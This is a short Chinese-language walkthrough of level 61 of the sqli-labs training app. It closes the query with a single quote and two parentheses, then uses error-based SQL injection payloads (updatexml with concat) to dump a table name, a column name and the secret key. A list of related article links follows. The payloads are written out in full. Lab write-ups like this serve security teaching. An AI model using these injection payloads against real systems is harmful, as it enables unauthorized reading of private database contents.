sqli-labs-Less-61

SQLI-LAPS 实验记录

Less-61

这一关与上一关类似,只是闭合方式不同,为单引号加双括号的方式,依然采用报错注入的方式通关。

根据之前的经验,我们在命令行中采用单引号加双括号来闭合,使用报错注入命令:

sql 复制代码
?id=-1')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1) --+

结果如图所示,能够爆出表名SU367R5TLR。

接下来,我们继续使用该语句来进行注入,爆出数列名以及秘钥,语句如下:

  • 查询列名
php 复制代码
?id=-1')) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='SU367R5TLR'),0x7e),1)--+

查询结果为secret_CH6P。

  • 查询秘钥
php 复制代码
?id=-1')) and updatexml(1,concat(0x7e,(select group_concat(secret_CH6P) from challenges.SU367R5TLR),0x7e),1) --+

查询如图所示,秘钥为RGPHim48wGuZe9NvjtVXnQ2f。
之后,将查询出的密钥输入页面下方的对话框中,就可以看到成功信息了。

相关推荐
jf加菲猫2 小时前
第10章 数据处理
xml·开发语言·数据库·c++·qt·ui
小陈工2 小时前
2026年4月1日技术资讯洞察:AI芯片革命、数据库智能化与云原生演进
前端·数据库·人工智能·git·python·云原生·开源
猿小喵2 小时前
MySQL数据库参数解读-第二篇
数据库·mysql
宁小法2 小时前
MySQL - information_schema.COLUMNS中字段的排序原则 以及如何修改
mysql·列排序
逆境不可逃2 小时前
【用AI学Agent】Agent入门进阶:Prompt工程
大数据·数据库·人工智能
PD我是你的真爱粉2 小时前
MySQL 索引深度解析:从底层结构到实战优化
数据库·mysql
神舟之光2 小时前
Springboot+MyBatis-Plus连接MySQL初体验
spring boot·mysql·mybatis
AlickLbc3 小时前
达梦数据库使用体验记录(1-数据库安装篇)
数据库
WangJunXiang63 小时前
MySQL高可用详细解析
android·数据库·mysql